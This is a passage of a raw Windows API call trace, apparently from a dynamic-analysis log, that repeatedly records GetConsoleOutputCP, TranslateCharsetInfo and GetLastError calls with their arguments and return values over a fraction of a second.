lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.350] GetLastError () returned 0xcb [0152.350] GetConsoleOutputCP () returned 0x1b5 [0152.350] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.350] GetLastError () returned 0xcb [0152.350] GetConsoleOutputCP () returned 0x1b5 [0152.351] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.351] GetLastError () returned 0xcb [0152.351] GetConsoleOutputCP () returned 0x1b5 [0152.351] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.351] GetLastError () returned 0xcb [0152.351] GetConsoleOutputCP () returned 0x1b5 [0152.351] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.351] GetLastError () returned 0xcb [0152.351] GetConsoleOutputCP () returned 0x1b5 [0152.351] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.351] GetLastError () returned 0xcb [0152.351] GetConsoleOutputCP () returned 0x1b5 [0152.351] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.351] GetLastError () returned 0xcb [0152.351] GetConsoleOutputCP () returned 0x1b5 [0152.351] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.351] GetLastError () returned 0xcb [0152.351] GetConsoleOutputCP () returned 0x1b5 [0152.352] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.352] GetLastError () returned 0xcb [0152.352] GetConsoleOutputCP () returned 0x1b5 [0152.352] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.352] GetLastError () returned 0xcb [0152.352] GetConsoleOutputCP () returned 0x1b5 [0152.352] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.352] GetLastError () returned 0xcb [0152.352] GetConsoleOutputCP () returned 0x1b5 [0152.352] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.352] GetLastError () returned 0xcb [0152.352] GetConsoleOutputCP () returned 0x1b5 [0152.352] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.352] GetLastError () returned 0xcb [0152.352] GetConsoleOutputCP () returned 0x1b5 [0152.352] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.352] GetLastError () returned 0xcb [0152.352] GetConsoleOutputCP () returned 0x1b5 [0152.352] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.353] GetLastError () returned 0xcb [0152.353] GetConsoleOutputCP () returned 0x1b5 [0152.353] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.353] GetLastError () returned 0xcb [0152.353] GetConsoleOutputCP () returned 0x1b5 [0152.353] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.353] GetLastError () returned 0xcb [0152.353] GetConsoleOutputCP () returned 0x1b5 [0152.353] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.353] GetLastError () returned 0xcb [0152.353] GetConsoleOutputCP () returned 0x1b5 [0152.353] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.353] GetLastError () returned 0xcb [0152.353] GetConsoleOutputCP () returned 0x1b5 [0152.353] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.353] GetLastError () returned 0xcb [0152.353] GetConsoleOutputCP () returned 0x1b5 [0152.353] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.353] GetLastError () returned 0xcb [0152.354] GetConsoleOutputCP () returned 0x1b5 [0152.354] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.354] GetLastError () returned 0xcb [0152.354] GetConsoleOutputCP () returned 0x1b5 [0152.354] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.354] GetLastError () returned 0xcb [0152.354] GetConsoleOutputCP () returned 0x1b5 [0152.354] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.354] GetLastError () returned 0xcb [0152.354] GetConsoleOutputCP () returned 0x1b5 [0152.354] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.354] GetLastError () returned 0xcb [0152.354] GetConsoleOutputCP () returned 0x1b5 [0152.354] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.354] GetLastError () returned 0xcb [0152.354] GetConsoleOutputCP () returned 0x1b5 [0152.354] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.354] GetLastError () returned 0xcb [0152.354] GetConsoleOutputCP () returned 0x1b5 [0152.354] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.354] GetLastError () returned 0xcb [0152.354] GetConsoleOutputCP () returned 0x1b5 [0152.355] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.355] GetLastError () returned 0xcb [0152.355] GetConsoleOutputCP () returned 0x1b5 [0152.355] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.355] GetLastError () returned 0xcb [0152.355] GetConsoleOutputCP () returned 0x1b5 [0152.355] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.355] GetLastError () returned 0xcb [0152.355] GetConsoleOutputCP () returned 0x1b5 [0152.355] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efe0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efe0) returned 0 [0152.355] GetLastError () returned 0xcb [0152.355] GetConsoleOutputCP () returned 0x1b5 [0152.355] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efe0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efe0) returned 0 [0152.355] GetLastError () returned 0xcb [0152.355] GetConsoleOutputCP () returned 0x1b5 [0152.355] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efe0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efe0) returned 0 [0152.355] GetLastError () returned 0xcb [0152.355] GetConsoleOutputCP () returned 0x1b5 [0152.355] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efe0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efe0) returned 0 [0152.355] GetLastError () returned 0xcb [0152.355] GetConsoleOutputCP () returned 0x1b5 [0152.355] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efe0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efe0) returned 0 [0152.355] GetLastError () returned 0xcb [0152.355] GetConsoleOutputCP () returned 0x1b5 [0152.356] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.356] GetLastError () returned 0xcb [0152.356] GetConsoleOutputCP () returned 0x1b5 [0152.356] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.356] GetLastError () returned 0xcb [0152.356] GetConsoleOutputCP () returned 0x1b5 [0152.356] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.356] GetLastError () returned 0xcb [0152.356] GetConsoleOutputCP () returned 0x1b5 [0152.356] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.356] GetLastError () returned 0xcb [0152.356] GetConsoleOutputCP () returned 0x1b5 [0152.356] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.356] GetLastError () returned 0xcb [0152.356] GetConsoleOutputCP () returned 0x1b5 [0152.356] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.356] GetLastError () returned 0xcb [0152.356] GetConsoleOutputCP () returned 0x1b5 [0152.356] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.356] GetLastError () returned 0xcb [0152.356] GetConsoleOutputCP () returned 0x1b5 [0152.356] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.356] GetLastError () returned 0xcb [0152.356] GetConsoleOutputCP () returned 0x1b5 [0152.357] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.357] GetLastError () returned 0xcb [0152.357] GetConsoleOutputCP () returned 0x1b5 [0152.357] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.357] GetLastError () returned 0xcb [0152.357] GetConsoleOutputCP () returned 0x1b5 [0152.357] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.357] GetLastError () returned 0xcb [0152.357] GetConsoleOutputCP () returned 0x1b5 [0152.357] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.357] GetLastError () returned 0xcb [0152.357] GetConsoleOutputCP () returned 0x1b5 [0152.357] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.357] GetLastError () returned 0xcb [0152.357] GetConsoleOutputCP () returned 0x1b5 [0152.357] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.357] GetLastError () returned 0xcb [0152.357] GetConsoleOutputCP () returned 0x1b5 [0152.357] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.357] GetLastError () returned 0xcb [0152.357] GetConsoleOutputCP () returned 0x1b5 [0152.358] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.358] GetLastError () returned 0xcb [0152.358] GetConsoleOutputCP () returned 0x1b5 [0152.358] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.358] GetLastError () returned 0xcb [0152.358] GetConsoleOutputCP () returned 0x1b5 [0152.358] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.358] GetLastError () returned 0xcb [0152.358] GetConsoleOutputCP () returned 0x1b5 [0152.358] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.358] GetLastError () returned 0xcb [0152.358] GetConsoleOutputCP () returned 0x1b5 [0152.358] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.358] GetLastError () returned 0xcb [0152.358] GetConsoleOutputCP () returned 0x1b5 [0152.358] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.358] GetLastError () returned 0xcb [0152.358] GetConsoleOutputCP () returned 0x1b5 [0152.358] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.358] GetLastError () returned 0xcb [0152.358] GetConsoleOutputCP () returned 0x1b5 [0152.358] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.358] GetLastError () returned 0xcb [0152.358] GetConsoleOutputCP () returned 0x1b5 [0152.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.359] GetLastError () returned 0xcb [0152.359] GetConsoleOutputCP () returned 0x1b5 [0152.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.359] GetLastError () returned 0xcb [0152.359] GetConsoleOutputCP () returned 0x1b5 [0152.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.359] GetLastError () returned 0xcb [0152.359] GetConsoleOutputCP () returned 0x1b5 [0152.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.359] GetLastError () returned 0xcb [0152.359] GetConsoleOutputCP () returned 0x1b5 [0152.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.359] GetLastError () returned 0xcb [0152.359] GetConsoleOutputCP () returned 0x1b5 [0152.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.359] GetLastError () returned 0xcb [0152.359] GetConsoleOutputCP () returned 0x1b5 [0152.359] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.359] GetLastError () returned 0xcb [0152.359] GetConsoleOutputCP () returned 0x1b5 [0152.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.360] GetLastError () returned 0xcb [0152.360] GetConsoleOutputCP () returned 0x1b5 [0152.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.360] GetLastError () returned 0xcb [0152.360] GetConsoleOutputCP () returned 0x1b5 [0152.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.360] GetLastError () returned 0xcb [0152.360] GetConsoleOutputCP () returned 0x1b5 [0152.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.360] GetLastError () returned 0xcb [0152.360] GetConsoleOutputCP () returned 0x1b5 [0152.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.360] GetLastError () returned 0xcb [0152.360] GetConsoleOutputCP () returned 0x1b5 [0152.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.360] GetLastError () returned 0xcb [0152.360] GetConsoleOutputCP () returned 0x1b5 [0152.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.360] GetLastError () returned 0xcb [0152.360] GetConsoleOutputCP () returned 0x1b5 [0152.360] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.360] GetLastError () returned 0xcb [0152.360] GetConsoleOutputCP () returned 0x1b5 [0152.361] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.361] GetLastError () returned 0xcb [0152.361] GetConsoleOutputCP () returned 0x1b5 [0152.361] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.361] GetLastError () returned 0xcb [0152.361] GetConsoleOutputCP () returned 0x1b5 [0152.361] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.361] GetLastError () returned 0xcb [0152.361] GetConsoleOutputCP () returned 0x1b5 [0152.361] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.361] GetLastError () returned 0xcb [0152.361] GetConsoleOutputCP () returned 0x1b5 [0152.361] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.361] GetLastError () returned 0xcb [0152.361] GetConsoleOutputCP () returned 0x1b5 [0152.361] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.361] GetLastError () returned 0xcb [0152.361] GetConsoleOutputCP () returned 0x1b5 [0152.361] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.361] GetLastError () returned 0xcb [0152.361] GetConsoleOutputCP () returned 0x1b5 [0152.361] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.361] GetLastError () returned 0xcb [0152.362] GetConsoleOutputCP () returned 0x1b5 [0152.362] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.362] GetLastError () returned 0xcb [0152.362] GetConsoleOutputCP () returned 0x1b5 [0152.362] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.362] GetLastError () returned 0xcb [0152.362] GetConsoleOutputCP () returned 0x1b5 [0152.362] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.362] GetLastError () returned 0xcb [0152.362] GetConsoleOutputCP () returned 0x1b5 [0152.362] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.362] GetLastError () returned 0xcb [0152.362] GetConsoleOutputCP () returned 0x1b5 [0152.362] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.362] GetLastError () returned 0xcb [0152.362] GetConsoleOutputCP () returned 0x1b5 [0152.362] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.362] GetLastError () returned 0xcb [0152.362] GetConsoleOutputCP () returned 0x1b5 [0152.362] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.362] GetLastError () returned 0xcb [0152.362] GetConsoleOutputCP () returned 0x1b5 [0152.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.363] GetLastError () returned 0xcb [0152.363] GetConsoleOutputCP () returned 0x1b5 [0152.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.363] GetLastError () returned 0xcb [0152.363] GetConsoleOutputCP () returned 0x1b5 [0152.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.363] GetLastError () returned 0xcb [0152.363] GetConsoleOutputCP () returned 0x1b5 [0152.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.363] GetLastError () returned 0xcb [0152.363] GetConsoleOutputCP () returned 0x1b5 [0152.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.363] GetLastError () returned 0xcb [0152.363] GetConsoleOutputCP () returned 0x1b5 [0152.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.363] GetLastError () returned 0xcb [0152.363] GetConsoleOutputCP () returned 0x1b5 [0152.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.363] GetLastError () returned 0xcb [0152.363] GetConsoleOutputCP () returned 0x1b5 [0152.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.363] GetLastError () returned 0xcb [0152.363] GetConsoleOutputCP () returned 0x1b5 [0152.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.364] GetLastError () returned 0xcb [0152.364] GetConsoleOutputCP () returned 0x1b5 [0152.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.364] GetLastError () returned 0xcb [0152.364] GetConsoleOutputCP () returned 0x1b5 [0152.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.364] GetLastError () returned 0xcb [0152.364] GetConsoleOutputCP () returned 0x1b5 [0152.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.364] GetLastError () returned 0xcb [0152.364] GetConsoleOutputCP () returned 0x1b5 [0152.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.364] GetLastError () returned 0xcb [0152.364] GetConsoleOutputCP () returned 0x1b5 [0152.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.364] GetLastError () returned 0xcb [0152.364] GetConsoleOutputCP () returned 0x1b5 [0152.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.364] GetLastError () returned 0xcb [0152.364] GetConsoleOutputCP () returned 0x1b5 [0152.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.365] GetLastError () returned 0xcb [0152.365] GetConsoleOutputCP () returned 0x1b5 [0152.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.365] GetLastError () returned 0xcb [0152.365] GetConsoleOutputCP () returned 0x1b5 [0152.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.365] GetLastError () returned 0xcb [0152.365] GetConsoleOutputCP () returned 0x1b5 [0152.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.365] GetLastError () returned 0xcb [0152.365] GetConsoleOutputCP () returned 0x1b5 [0152.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.365] GetLastError () returned 0xcb [0152.365] GetConsoleOutputCP () returned 0x1b5 [0152.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.367] GetLastError () returned 0xcb [0152.367] GetConsoleOutputCP () returned 0x1b5 [0152.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, 